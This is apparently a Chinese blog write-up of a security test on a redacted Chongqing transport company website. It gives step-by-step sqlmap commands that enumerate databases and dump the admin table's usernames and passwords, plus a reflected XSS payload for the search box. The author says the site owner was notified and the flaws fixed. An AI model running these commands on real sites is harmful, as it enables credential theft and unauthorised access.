实战——重庆某公路运输公司官网存在SQL注入、XSS记录



遵守《中华人民共和国网络安全法》



一切仅作为测试,无任何破坏行为,并已通知站点管理员相关漏洞信息。





站点URL:http://www.***.com/***.jsp?id=15 ,重庆一家大型企业网站。


难度:❤


① py sqlmap.py -u "URL"  检测可以注入,手工也可以


② py sqlmap.py -u "URL" --dbs   如下四个数据库,且是mysql 5.0以上,存在 information_schema 元数据库

happysneaker.com


③ py sqlmap.py -u "URL" --tables       列出 gyjt 库下的所有表,其他三个库非目标

happysneaker.com


④ 看到其中一个表名是 *admin ,那么应该是管理员表,可以爆字段了

py sqlmap.py -u "URL" -T "tadmin" --columns

happysneaker.com


⑤ dump具体内容    : py sqlmap.py -u "URL" --dump -T "tadmin" -C "username,password"

得到用户名及密码。

注意可能column会经常改,因此需要根据情况变化而变化。


⑥ 找后台吧:Mark



这个站漏洞百出,很难想象XSS也行,在搜索框构造 </title><script>alert(132)</script>:

happysneaker.com

happysneaker.com



多亏网站只有个搜索功能,查看后台代码并未进行保存,因此是个反射型XSS,但利用好了也是能获取最高权限的。





漏洞已经修复,文章才进行发表的。



收获:此次安全测试没有多少营养。











Web安全技术分享
请先登录后发表评论
  • 最新评论
  • 总共0条评论